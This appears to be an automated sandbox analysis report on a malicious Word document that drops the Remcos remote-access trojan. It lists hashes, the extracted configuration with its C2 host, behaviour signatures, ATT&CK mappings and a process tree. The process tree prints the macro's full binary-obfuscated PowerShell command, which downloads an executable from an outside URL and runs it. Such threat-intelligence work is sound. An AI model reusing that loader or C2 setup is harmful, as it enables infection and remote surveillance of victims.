remcos | 9c5912424f920b71a98b0ac032cb3e74ca830dd0c9e9e2d406f4b9ff1f53af80

General

Target

Payment Advice.doc
Size

217KB
MD5

a1bb900ae8003b924f333442c4117a84
SHA1

126cd9e2de926ade2cdb20fb8d2a059b7786fde6
SHA256

9c5912424f920b71a98b0ac032cb3e74ca830dd0c9e9e2d406f4b9ff1f53af80
SHA512

c7dbbc07793a59b038f5376b345aeb9c967f339b36e9242043207a66bc27a6b3046f7d143a61d48ae4ef9423efcff6919d30cfb86e736f16aa74dcf81c812f5e

Score

10^/10

remcos julbuild persistence rat

Malware Config

Extracted

Family

remcos

Botnet

JULBUILD

C2

saptransmissions.dvrlists.com:6969

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
JULBUILD
keylog_path
%AppData%
mouse_option
false
mutex
JULBUILD-7DBACB
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
wikipedia;solitaire;

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	404	3256	powershell.exe	WINWORD.EXE

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exemshta.exe

flow pid process

30 404 powershell.exe
35 2496 mshta.exe
39 2496 mshta.exe
40 2496 mshta.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

winint.exe

pid process

4036 winint.exe

flow	pid	process
30	404	powershell.exe
35	2496	mshta.exe
39	2496	mshta.exe
40	2496	mshta.exe

pid	process
4036	winint.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

winint.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kajscxo = "C:\\Users\\Public\\Libraries\\oxcsjaK.url"	winint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3256 WINWORD.EXE
3256 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

404 powershell.exe
404 powershell.exe
404 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

mshta.exe

pid process

2496 mshta.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 404 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

3256 WINWORD.EXE
3256 WINWORD.EXE
3256 WINWORD.EXE
3256 WINWORD.EXE
3256 WINWORD.EXE
3256 WINWORD.EXE
3256 WINWORD.EXE

pid	process
3256	WINWORD.EXE
3256	WINWORD.EXE

pid	process
404	powershell.exe
404	powershell.exe
404	powershell.exe

pid	process
2496	mshta.exe

description	pid	process
Token: SeDebugPrivilege	404	powershell.exe

pid	process
3256	WINWORD.EXE
3256	WINWORD.EXE
3256	WINWORD.EXE
3256	WINWORD.EXE
3256	WINWORD.EXE
3256	WINWORD.EXE
3256	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WINWORD.EXEpowershell.exewinint.exe

description	pid	process	target process
PID 3256 wrote to memory of 404	3256	WINWORD.EXE	powershell.exe
PID 3256 wrote to memory of 404	3256	WINWORD.EXE	powershell.exe
PID 404 wrote to memory of 4036	404	powershell.exe	winint.exe
PID 404 wrote to memory of 4036	404	powershell.exe	winint.exe
PID 404 wrote to memory of 4036	404	powershell.exe	winint.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe
PID 4036 wrote to memory of 2496	4036	winint.exe	mshta.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Advice.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,01110011,00111010,00101111,00101111,01100011,01100100,01101110,00101110,01100100,01101001,01110011,01100011,01101111,01110010,01100100,01100001,01110000,01110000,00101110,01100011,01101111,01101101,00101111,01100001,01110100,01110100,01100001,01100011,01101000,01101101,01100101,01101110,01110100,01110011,00101111,00111000,00110101,00110110,00111001,00110010,00110101,00111001,00110101,00110010,00110000,00110000,00110100,00110000,00110110,00110011,00110010,00110100,00110010,00101111,00111000,00110110,00110101,00110010,00110111,00110100,00110010,00110000,00110010,00110011,00110111,00111000,00110110,00110000,00110000,00110100,00110100,00111001,00101111,01010011,01100101,01100011,01110101,01110010,01100101,01000101,01000110,01010100,01001110,01101111,01110100,01101001,01100011,01100101,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01110111,01101001,01101110,01101001,01101110,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404

C:\Users\Admin\AppData\Local\Temp\winint.exe
"C:\Users\Admin\AppData\Local\Temp\winint.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\SysWOW64\mshta.exe
C:\Windows\System32\mshta.exe
4⤵
- Blocklisted process makes network request
- Suspicious behavior: GetForegroundWindowSpam
PID:2496

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\winint.exe
MD5
36f250cb265a9ea1e50697c0def52aa8

SHA1
ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3

SHA256
eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514

SHA512
ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56

Download Submit
C:\Users\Admin\AppData\Local\Temp\winint.exe
MD5
36f250cb265a9ea1e50697c0def52aa8

SHA1
ab1b5c8c68b77b4ab53cfed9ee5f2c192a29f5a3

SHA256
eb92966bcd8187376efd77e3ce4d830b8ae81de436f23a604c218beac3554514

SHA512
ef70fa852f3a4abc6bae263fb423be14e246739814471d7ddbcc588e30f5345910490a49f2a396e4da24c70427d103934a4502e7dea9dec9dc370d8315bc9c56

Download Submit
memory/404-266-0x0000000000000000-mapping.dmp

Download
memory/404-289-0x000001A77F8E6000-0x000001A77F8E8000-memory.dmp

Filesize
8KB

Download
memory/404-288-0x000001A77F8E3000-0x000001A77F8E5000-memory.dmp

Filesize
8KB

Download
memory/404-287-0x000001A77F8E0000-0x000001A77F8E2000-memory.dmp

Filesize
8KB

Download
memory/404-282-0x000001A77FAF0000-0x000001A77FAF1000-memory.dmp

Filesize
4KB

Download
memory/404-278-0x000001A77F4A0000-0x000001A77F4A1000-memory.dmp

Filesize
4KB

Download
memory/2496-318-0x0000000000970000-0x00000000009EA000-memory.dmp

Filesize
488KB

Download
memory/2496-314-0x0000000000000000-mapping.dmp

Download
memory/2496-316-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/2496-315-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/2496-317-0x0000000010590000-0x000000001060D000-memory.dmp

Filesize
500KB

Download
memory/2496-319-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download
memory/3256-122-0x00007FFCD56E0000-0x00007FFCD67CE000-memory.dmp

Filesize
16.9MB

Download
memory/3256-123-0x00007FFCD37E0000-0x00007FFCD56D5000-memory.dmp

Filesize
31.0MB

Download
memory/3256-114-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp

Filesize
64KB

Download
memory/3256-118-0x00007FFCDC8B0000-0x00007FFCDF3D3000-memory.dmp

Filesize
43.1MB

Download
memory/3256-119-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp

Filesize
64KB

Download
memory/3256-117-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp

Filesize
64KB

Download
memory/3256-116-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp

Filesize
64KB

Download
memory/3256-115-0x00007FFCBABC0000-0x00007FFCBABD0000-memory.dmp

Filesize
64KB

Download
memory/4036-304-0x0000000000000000-mapping.dmp

Download
memory/4036-308-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/4036-311-0x0000000005790000-0x00000000057AA000-memory.dmp

Filesize
104KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads